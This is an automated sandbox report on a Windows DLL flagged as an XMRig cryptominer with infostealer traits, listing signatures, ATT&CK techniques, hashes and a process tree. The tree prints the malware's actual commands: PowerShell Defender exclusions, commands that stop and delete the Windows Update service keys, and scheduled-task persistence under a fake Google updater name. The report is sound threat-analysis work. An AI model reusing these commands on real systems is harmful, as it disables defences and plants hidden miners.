xmrig | fc33ed2f28a10b4b3cb775f7e699295f604d28bf3bf2cb2bc9185d002f89f91c

Analysis

max time kernel
150s
max time network
142s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
08-09-2022 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mamamiya137_ru_.bin.dll
Size

2.7MB
MD5

36c48ba4f231388a5f08fae2df0cec58
SHA1

3ba1d0aac10a41519610cf9166ab39b4c092d431
SHA256

fc33ed2f28a10b4b3cb775f7e699295f604d28bf3bf2cb2bc9185d002f89f91c
SHA512

4aa0e73f4eebfeb6cdeaf7cb0d050355185d3b8d91c044a911f895ec614ff0cb8b6d8e89ce3ea73052a4b55444ef1c7f72eaeabf2946a6bee8383ad03d93d4ee
SSDEEP

49152:Jzl1rpbUrqvv0v2rQVt8nqwI7lOOYc92ek:P1Kqvv07noI7lOOYcX

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/1256-137-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1256-142-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	1236	rundll32.exe
4	1236	rundll32.exe
6	1236	rundll32.exe
8	1236	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1800	sylifro.exe
788	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1256-137-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1256-142-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 2 IoCs

pid	Process
1236	rundll32.exe
780	taskeng.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 788 set thread context of 1480	788	updater.exe	67
PID 788 set thread context of 1256	788	updater.exe	73

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1864	sc.exe
1500	sc.exe
564	sc.exe
1724	sc.exe
804	sc.exe
1724	sc.exe
1840	sc.exe
1932	sc.exe
628	sc.exe
1732	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1244	schtasks.exe
1736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1236	rundll32.exe
1044	powershell.exe
876	powershell.exe
364	powershell.exe
848	powershell.exe
528	powershell.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe
1256	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	364	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	788	updater.exe
Token: SeIncreaseQuotaPrivilege	876	WMIC.exe
Token: SeSecurityPrivilege	876	WMIC.exe
Token: SeTakeOwnershipPrivilege	876	WMIC.exe
Token: SeLoadDriverPrivilege	876	WMIC.exe
Token: SeSystemProfilePrivilege	876	WMIC.exe
Token: SeSystemtimePrivilege	876	WMIC.exe
Token: SeProfSingleProcessPrivilege	876	WMIC.exe
Token: SeIncBasePriorityPrivilege	876	WMIC.exe
Token: SeCreatePagefilePrivilege	876	WMIC.exe
Token: SeBackupPrivilege	876	WMIC.exe
Token: SeRestorePrivilege	876	WMIC.exe
Token: SeShutdownPrivilege	876	WMIC.exe
Token: SeDebugPrivilege	876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	876	WMIC.exe
Token: SeRemoteShutdownPrivilege	876	WMIC.exe
Token: SeUndockPrivilege	876	WMIC.exe
Token: SeManageVolumePrivilege	876	WMIC.exe
Token: 33	876	WMIC.exe
Token: 34	876	WMIC.exe
Token: 35	876	WMIC.exe
Token: SeDebugPrivilege	788	updater.exe
Token: SeIncreaseQuotaPrivilege	876	WMIC.exe
Token: SeSecurityPrivilege	876	WMIC.exe
Token: SeTakeOwnershipPrivilege	876	WMIC.exe
Token: SeLoadDriverPrivilege	876	WMIC.exe
Token: SeSystemProfilePrivilege	876	WMIC.exe
Token: SeSystemtimePrivilege	876	WMIC.exe
Token: SeProfSingleProcessPrivilege	876	WMIC.exe
Token: SeIncBasePriorityPrivilege	876	WMIC.exe
Token: SeCreatePagefilePrivilege	876	WMIC.exe
Token: SeBackupPrivilege	876	WMIC.exe
Token: SeRestorePrivilege	876	WMIC.exe
Token: SeShutdownPrivilege	876	WMIC.exe
Token: SeDebugPrivilege	876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	876	WMIC.exe
Token: SeRemoteShutdownPrivilege	876	WMIC.exe
Token: SeUndockPrivilege	876	WMIC.exe
Token: SeManageVolumePrivilege	876	WMIC.exe
Token: 33	876	WMIC.exe
Token: 34	876	WMIC.exe
Token: 35	876	WMIC.exe
Token: SeLockMemoryPrivilege	1256	dwm.exe
Token: SeLockMemoryPrivilege	1256	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1348 wrote to memory of 1236	1348	rundll32.exe	26
PID 1236 wrote to memory of 1800	1236	rundll32.exe	27
PID 1236 wrote to memory of 1800	1236	rundll32.exe	27
PID 1236 wrote to memory of 1800	1236	rundll32.exe	27
PID 1236 wrote to memory of 1800	1236	rundll32.exe	27
PID 1800 wrote to memory of 1044	1800	sylifro.exe	28
PID 1800 wrote to memory of 1044	1800	sylifro.exe	28
PID 1800 wrote to memory of 1044	1800	sylifro.exe	28
PID 1800 wrote to memory of 1744	1800	sylifro.exe	30
PID 1800 wrote to memory of 1744	1800	sylifro.exe	30
PID 1800 wrote to memory of 1744	1800	sylifro.exe	30
PID 1800 wrote to memory of 876	1800	sylifro.exe	31
PID 1800 wrote to memory of 876	1800	sylifro.exe	31
PID 1800 wrote to memory of 876	1800	sylifro.exe	31
PID 1744 wrote to memory of 1500	1744	cmd.exe	34
PID 1744 wrote to memory of 1500	1744	cmd.exe	34
PID 1744 wrote to memory of 1500	1744	cmd.exe	34
PID 1744 wrote to memory of 564	1744	cmd.exe	35
PID 1744 wrote to memory of 564	1744	cmd.exe	35
PID 1744 wrote to memory of 564	1744	cmd.exe	35
PID 1744 wrote to memory of 1724	1744	cmd.exe	36
PID 1744 wrote to memory of 1724	1744	cmd.exe	36
PID 1744 wrote to memory of 1724	1744	cmd.exe	36
PID 1744 wrote to memory of 1932	1744	cmd.exe	37
PID 1744 wrote to memory of 1932	1744	cmd.exe	37
PID 1744 wrote to memory of 1932	1744	cmd.exe	37
PID 1744 wrote to memory of 804	1744	cmd.exe	38
PID 1744 wrote to memory of 804	1744	cmd.exe	38
PID 1744 wrote to memory of 804	1744	cmd.exe	38
PID 1744 wrote to memory of 1732	1744	cmd.exe	39
PID 1744 wrote to memory of 1732	1744	cmd.exe	39
PID 1744 wrote to memory of 1732	1744	cmd.exe	39
PID 1744 wrote to memory of 1784	1744	cmd.exe	40
PID 1744 wrote to memory of 1784	1744	cmd.exe	40
PID 1744 wrote to memory of 1784	1744	cmd.exe	40
PID 1744 wrote to memory of 336	1744	cmd.exe	41
PID 1744 wrote to memory of 336	1744	cmd.exe	41
PID 1744 wrote to memory of 336	1744	cmd.exe	41
PID 1744 wrote to memory of 1816	1744	cmd.exe	42
PID 1744 wrote to memory of 1816	1744	cmd.exe	42
PID 1744 wrote to memory of 1816	1744	cmd.exe	42
PID 1744 wrote to memory of 652	1744	cmd.exe	43
PID 1744 wrote to memory of 652	1744	cmd.exe	43
PID 1744 wrote to memory of 652	1744	cmd.exe	43
PID 876 wrote to memory of 1244	876	powershell.exe	44
PID 876 wrote to memory of 1244	876	powershell.exe	44
PID 876 wrote to memory of 1244	876	powershell.exe	44
PID 1800 wrote to memory of 364	1800	sylifro.exe	45
PID 1800 wrote to memory of 364	1800	sylifro.exe	45
PID 1800 wrote to memory of 364	1800	sylifro.exe	45
PID 364 wrote to memory of 728	364	powershell.exe	47
PID 364 wrote to memory of 728	364	powershell.exe	47
PID 364 wrote to memory of 728	364	powershell.exe	47
PID 780 wrote to memory of 788	780	taskeng.exe	49
PID 780 wrote to memory of 788	780	taskeng.exe	49
PID 780 wrote to memory of 788	780	taskeng.exe	49
PID 788 wrote to memory of 848	788	updater.exe	50
PID 788 wrote to memory of 848	788	updater.exe	50

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mamamiya137_ru_.bin.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1348
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\mamamiya137_ru_.bin.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Users\Admin\AppData\Local\Temp\sylifro.exe
    "C:\Users\Admin\AppData\Local\Temp\sylifro.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1044
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1744
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1500
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:564
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1724
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1932
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:804
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:1732
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:1784
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1816
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:876
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
        5⤵
        Creates scheduled task(s)
        
        PID:1244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:364
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:728

C:\Windows\system32\taskeng.exe
taskeng.exe {CE9AF132-FDAA-4AA4-AB58-9459663F7AFD} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:780
- C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:848
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:992
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:628
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1724
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:1840
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:1864
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:1732
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:1816
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:1036
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:652
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:1184
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:1656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:528
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
      4⤵
      Creates scheduled task(s)
      PID:1736
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe jmcfgycslfymn
    3⤵
    PID:1480
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
      4⤵
      PID:1324
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:876
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
    3⤵
    PID:2044
- - C:\Windows\system32\dwm.exe
    C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1256

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\sylifro.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Local\Temp\sylifro.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

Filesize
134B

MD5
13704a81e6a12d0657753b6746a4fb24

SHA1
9e1dd1fa6000c991e12a1ab41f3fb04ed37a6cca

SHA256
56556055091ba96cf10e85b2db4c5154e2b647b832a272915f973862c3c531a4

SHA512
e099d6c94c431c4cc9df82f4993a8d91a36b1c351f1a4eb699fc6b67b3a8dd0c386b2346dc1dcb854db004cea2070f38d717caba8a922926ecec968ebe6db66e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
664a60d076f3d044b2f27da8f7bc14f5

SHA1
c8184122a64af71074eafa37e1cb5a47d5639632

SHA256
7699090de663c48a1fc93162ae7bac6b9475cf3d616664179c8cd77e44b3861d

SHA512
b79b03dd4757b42eaf3379fa19b3a6fbc15925bf00b9933376ab55193a45cf8c2d9ca18887b74d670fa5625ad0b217c865bdc866c257f5d80422e8311660e7e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
664a60d076f3d044b2f27da8f7bc14f5

SHA1
c8184122a64af71074eafa37e1cb5a47d5639632

SHA256
7699090de663c48a1fc93162ae7bac6b9475cf3d616664179c8cd77e44b3861d

SHA512
b79b03dd4757b42eaf3379fa19b3a6fbc15925bf00b9933376ab55193a45cf8c2d9ca18887b74d670fa5625ad0b217c865bdc866c257f5d80422e8311660e7e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
664a60d076f3d044b2f27da8f7bc14f5

SHA1
c8184122a64af71074eafa37e1cb5a47d5639632

SHA256
7699090de663c48a1fc93162ae7bac6b9475cf3d616664179c8cd77e44b3861d

SHA512
b79b03dd4757b42eaf3379fa19b3a6fbc15925bf00b9933376ab55193a45cf8c2d9ca18887b74d670fa5625ad0b217c865bdc866c257f5d80422e8311660e7e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
664a60d076f3d044b2f27da8f7bc14f5

SHA1
c8184122a64af71074eafa37e1cb5a47d5639632

SHA256
7699090de663c48a1fc93162ae7bac6b9475cf3d616664179c8cd77e44b3861d

SHA512
b79b03dd4757b42eaf3379fa19b3a6fbc15925bf00b9933376ab55193a45cf8c2d9ca18887b74d670fa5625ad0b217c865bdc866c257f5d80422e8311660e7e2

Download Submit
\Users\Admin\AppData\Local\Temp\sylifro.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
memory/336-80-0x0000000000000000-mapping.dmp

Download
memory/364-91-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp

Filesize
10.1MB

Download
memory/364-96-0x0000000002904000-0x0000000002907000-memory.dmp

Filesize
12KB

Download
memory/364-94-0x000000001B7C0000-0x000000001BABF000-memory.dmp

Filesize
3.0MB

Download
memory/364-97-0x000000000290B000-0x000000000292A000-memory.dmp

Filesize
124KB

Download
memory/364-93-0x0000000002904000-0x0000000002907000-memory.dmp

Filesize
12KB

Download
memory/364-92-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

Filesize
11.4MB

Download
memory/364-88-0x0000000000000000-mapping.dmp

Download
memory/528-116-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp

Filesize
10.1MB

Download
memory/528-119-0x0000000002404000-0x0000000002407000-memory.dmp

Filesize
12KB

Download
memory/528-130-0x0000000002404000-0x0000000002407000-memory.dmp

Filesize
12KB

Download
memory/528-120-0x000000001B8C0000-0x000000001BBBF000-memory.dmp

Filesize
3.0MB

Download
memory/528-131-0x000000000240B000-0x000000000242A000-memory.dmp

Filesize
124KB

Download
memory/528-112-0x0000000000000000-mapping.dmp

Download
memory/528-117-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

